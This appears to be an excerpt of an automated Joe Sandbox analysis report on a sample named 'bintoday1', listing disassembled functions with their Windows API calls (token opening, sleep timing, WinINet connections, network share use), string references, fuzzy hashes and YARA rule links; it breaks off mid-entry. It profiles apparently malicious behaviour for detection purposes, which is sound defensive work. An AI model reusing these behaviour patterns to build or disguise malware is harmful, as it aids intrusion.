Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 22a98468e9ab2925c81d8351371185ceee32624f969214be949e7a737310b100
Instruction ID: d2e289c2ac9441fc4afa68e3f3ec735ea213aca0a43dbe63c4fcb2a1f9d016cf
Opcode Fuzzy Hash: 22a98468e9ab2925c81d8351371185ceee32624f969214be949e7a737310b100
Instruction Fuzzy Hash: C501FC33311622ABC7314B79AC84F6F77D8EF05F61B548668F956E3140C721D901C6D0

Function 00BF7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00BF747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00BF7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00BF74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00BF74CA

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: eea32a155257a2ca89f2e540ff1bd29426e1dacb2d1fa9189daad099271857e2
Instruction ID: 3a6bde8ad3336e1ad8fb118b8610ec3916a09a60257fd3e423a98597a810eb2d
Opcode Fuzzy Hash: eea32a155257a2ca89f2e540ff1bd29426e1dacb2d1fa9189daad099271857e2
Instruction Fuzzy Hash: 29118EB12453199BE7309F14EC49BAA7BFCEB00B00F1085E9A616D7691DB70E908DB90

Function 00BFB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00BFACD3,?,00008000), ref: 00BFB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00BFACD3,?,00008000), ref: 00BFB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00BFACD3,?,00008000), ref: 00BFB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00BFACD3,?,00008000), ref: 00BFB126

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: ccd563167d51f58107006604eafe5a8aecf9cc0c078c8723b50ab866e5d9d1b8
Instruction ID: abb5ba49c82264e6f54ad5baf78ebad9305b6fdd6d141a4dbd4dfa45545ed979
Opcode Fuzzy Hash: ccd563167d51f58107006604eafe5a8aecf9cc0c078c8723b50ab866e5d9d1b8
Instruction Fuzzy Hash: 0D113931C11A2CE7CF10AFA4E9A9BFEBBB8FF09711F104085DA41B3581CB3096698B51

Function 00BF2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00BF2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00BF2DD6
GetCurrentThreadId.KERNEL32 ref: 00BF2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00BF2DE4

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 4e2201af38eae128f74cf6ff992467fffbc94ddc56686d6df44289c2dce44df0
Instruction ID: 9cfed1fb0c2625757101b28ebf80b1199216b94de2f92edd6ea85f217d3b508e
Opcode Fuzzy Hash: 4e2201af38eae128f74cf6ff992467fffbc94ddc56686d6df44289c2dce44df0
Instruction Fuzzy Hash: 1CE09271111628BBE7301B729C8EFFF7EACEF42BA1F400165F605D24809AA4C846C6F0

Function 00C28863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00BA9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BA9693
Part of subcall function 00BA9639: SelectObject.GDI32(?,00000000), ref: 00BA96A2
Part of subcall function 00BA9639: BeginPath.GDI32(?), ref: 00BA96B9
Part of subcall function 00BA9639: SelectObject.GDI32(?,00000000), ref: 00BA96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C28887
LineTo.GDI32(?,?,?), ref: 00C28894
EndPath.GDI32(?), ref: 00C288A4
StrokePath.GDI32(?), ref: 00C288B2

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 7d13ad17a1e525de4dfa96f11872406eb02b1b95c5fa03e8a33989eaa877c22a
Instruction ID: 39c3afb5d22c765a0e4da14f979a2b446c5c0fca1c40f5612407468acf5122ee
Opcode Fuzzy Hash: 7d13ad17a1e525de4dfa96f11872406eb02b1b95c5fa03e8a33989eaa877c22a
Instruction Fuzzy Hash: 50F05E36046668FAEB225F94AC0AFCE3F59AF06711F088000FA11654E1C7B55622DFE5

Function 00BA98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BA98CC
SetTextColor.GDI32(?,?), ref: 00BA98D6
SetBkMode.GDI32(?,00000001), ref: 00BA98E9
GetStockObject.GDI32(00000005), ref: 00BA98F1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: dfc11b0847e847ced0fc1550c6358a81c112c382dca7ee9ee8b0037f6ba497d9
Instruction ID: 3206dd5ca1fb8cd4ddd87ab9e157be324eda02abeb7d88a999d4f09b38a0f536
Opcode Fuzzy Hash: dfc11b0847e847ced0fc1550c6358a81c112c382dca7ee9ee8b0037f6ba497d9
Instruction Fuzzy Hash: 13E09B31254680BEDB315B79FC49BDD3F60EB12336F048259F6F5544E1C7714651AB11

Function 00BF162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00BF1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,00BF11D9), ref: 00BF163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00BF11D9), ref: 00BF1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,00BF11D9), ref: 00BF164F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: a72f42eb8d440480b87ac639136aab6008c2d45080fe11f7fea8915575122e33
Instruction ID: f96597f2fbed797ec6e0a7116386adee3547c758d388d69ae50bc1d98fb10b85
Opcode Fuzzy Hash: a72f42eb8d440480b87ac639136aab6008c2d45080fe11f7fea8915575122e33
Instruction Fuzzy Hash: B6E08631611211EBD7301FA49D4DB9E3BBCEF44791F144C48F345CA090D6344446C754

Function 00BED858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00BED858
GetDC.USER32(00000000), ref: 00BED862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BED882
ReleaseDC.USER32(?), ref: 00BED8A3

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ead80dc47653dd0f20bba9c9ef9ed3090db6ae6c720976978baa051314bc7371
Instruction ID: 00f4fde927e780548967ff18cd04085514e1aae76e4d94372d3862962fb4811e
Opcode Fuzzy Hash: ead80dc47653dd0f20bba9c9ef9ed3090db6ae6c720976978baa051314bc7371
Instruction Fuzzy Hash: 44E01AB5810204DFCF619FA0D88876DBBF1FB08710F108059F81AE7650C7384902AF40

Function 00BED86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00BED86C
GetDC.USER32(00000000), ref: 00BED876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BED882
ReleaseDC.USER32(?), ref: 00BED8A3

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c63b2c0fddd20979527a9f3fbae1fdbdbafdd12548a5ac2b0e8f7c82e556882d
Instruction ID: 1c30e495ad11ec13535eabedaa2edbf386000340c98aa7ea4748cb5a9bbf3906
Opcode Fuzzy Hash: c63b2c0fddd20979527a9f3fbae1fdbdbafdd12548a5ac2b0e8f7c82e556882d
Instruction Fuzzy Hash: C6E012B5C10200EFCF60AFA0D88876DBBF1FB08710B108049F81AE7A50CB385902AF80

Function 00C04D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B97620: _wcslen.LIBCMT ref: 00B97625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C04ED4

Strings

*, xrefs: 00C04E10
LPT, xrefs: 00C04DFB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: d4f4e3a1dcd69b4dffce2be348334b8ba0485ba9fbed526cf73ae17b05ebce92
Instruction ID: a42d8ffe18f4e2ff9c53f9e8332980509c04c087694f31c2f34704cb7c58e84b
Opcode Fuzzy Hash: d4f4e3a1dcd69b4dffce2be348334b8ba0485ba9fbed526cf73ae17b05ebce92
Instruction Fuzzy Hash: 259182B5A042059FCB18DF98C484EAABBF1FF44304F158099E51A9F3A2C731EE85CB90

Function 00BAE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00BAE1B1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 1dddc716be4b78643927d199b40b46667b3532582ad207a3b32ef9ae08102256
Instruction ID: 326f62e52febf6ebc7863063281b53bc7030665f2a25bfed6c40919db8961454
Opcode Fuzzy Hash: 1dddc716be4b78643927d199b40b46667b3532582ad207a3b32ef9ae08102256
Instruction Fuzzy Hash: 3A51EF755043869FDB25DF69C481ABE7BE4EF66310F244099ECA19B290DB34DD42CBA0

Function 00BAF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00BAF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 00BAF2BB

Strings

@, xrefs: 00BAF2AF

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 14034d88396d86c4dc415a5d6e10d52b6a12363e151db0f27b2215d4a46fc2fb
Instruction ID: af403ac4e002d351b63519ca75f71c56f3e479a51a8bfe237977e4e12e474c95
Opcode Fuzzy Hash: 14034d88396d86c4dc415a5d6e10d52b6a12363e151db0f27b2215d4a46fc2fb
Instruction Fuzzy Hash: 035137724187449BD720AF21DC86BAFBBF8FB85300F81889DF1D941195EB708569CB66

Function 00C15745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00C157E0
_wcslen.LIBCMT ref: 00C157EC

Strings

CALLARGARRAY, xrefs: 00C157E6, 00C157EB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 89258f33c95d423725d89c90242233236eb1eb4cd449efd9a08fd0919fc2301f
Instruction ID: 002f1908e43e29954f39a908d599aa0ff559cc2e7224bb89c61e2ebf32dc4ffa
Opcode Fuzzy Hash: 89258f33c95d423725d89c90242233236eb1eb4cd449efd9a08fd0919fc2301f
Instruction Fuzzy Hash: 66418C71A40209DFDB14DFA9C8819FEBBF5FF9A324F104069E515A7291EB309E81DB90

Function 00C0D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C0D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C0D13A

Strings

|, xrefs: 00C0D10B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 96be5f2024dbdee6a12144ff8c2b84baef0d332ff13290d844a6a3ead53a7cf0
Instruction ID: 3d3b1de9259ba2a8b4e79f2c6952b4368db3d3d19bfbc272d2c098136fcc2cda
Opcode Fuzzy Hash: 96be5f2024dbdee6a12144ff8c2b84baef0d332ff13290d844a6a3ead53a7cf0
Instruction Fuzzy Hash: 74311D71D00219ABCF15EFA5CC85AEE7FB9FF04350F100069F815A6166DB31AA56DB50

Function 00C2356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00C23621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C2365C

Strings

static, xrefs: 00C235BC

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: fa1d2c7b6ea2f8f18d98a71fbbe1150047cf159e2d1ccc5704e7eb0e2a031adb
Instruction ID: 51fc62df71d5106e049267137e8e85dfbd73eea927d5f82e817b54ed334e51d1
Opcode Fuzzy Hash: fa1d2c7b6ea2f8f18d98a71fbbe1150047cf159e2d1ccc5704e7eb0e2a031adb
Instruction Fuzzy Hash: 56319071110654AEDB20DF28EC80FFB73ADFF48720F108619F9A997290DA35AD91D760

Function 00C24537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00C2461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C24634

Strings

', xrefs: 00C2458E

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 05b3da2e4537f0f3c8e75e0491fa6a397fe0d04cd120d1f84004e080e1c6be96
Instruction ID: afa0af8052c960a02420d673d60f4e05a9e97965203ca11f913a361674c40629
Opcode Fuzzy Hash: 05b3da2e4537f0f3c8e75e0491fa6a397fe0d04cd120d1f84004e080e1c6be96
Instruction Fuzzy Hash: B93139B4A003199FDF18CFA9D980BDA7BB5FF09300F14406AE904AB741D770AA41CF90

Function 00C231EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C2327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C23287

Strings

Combobox, xrefs: 00C23249

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 22decc1cb3c33d4cacb2057db9014f57b046d676013e503a54c906f96b306872
Instruction ID: 3280ec928110c0edf743311519a15827876cc9e7ff13957699183402eea837bd
Opcode Fuzzy Hash: 22decc1cb3c33d4cacb2057db9014f57b046d676013e503a54c906f96b306872
Instruction Fuzzy Hash: 3211E271300258BFEF21DE54EC80FBB3B6AEB98364F100124F928A7692D6759E518760

Function 00C23710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00B9600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B9604C
Part of subcall function 00B9600E: GetStockObject.GDI32(00000011), ref: 00B96060
Part of subcall function 00B9600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B9606A

GetWindowRect.USER32(00000000,?), ref: 00C2377A
GetSysColor.USER32(00000012), ref: 00C23794

Strings

static, xrefs: 00C23757

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 218ea6a2b9cbb6e76d14557253d705e5e5c3f2bcdea5b14ae677ae5df15cee94
Instruction ID: 67cd85696d28256c7ffbc965580af5ed36e1d7609fa7c12085c0e03c73425735
Opcode Fuzzy Hash: 218ea6a2b9cbb6e76d14557253d705e5e5c3f2bcdea5b14ae677ae5df15cee94
Instruction Fuzzy Hash: 6B1159B2610219AFDF10DFA8DC85AEE7BB8FB08304F004524F965E2250D774E911DB50

Function 00C0CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C0CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C0CDA6

Strings

<local>, xrefs: 00C0CD66

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 1634ff44a925b87e20362cb41550769e171235ead0e82151bbded82bb03b1365
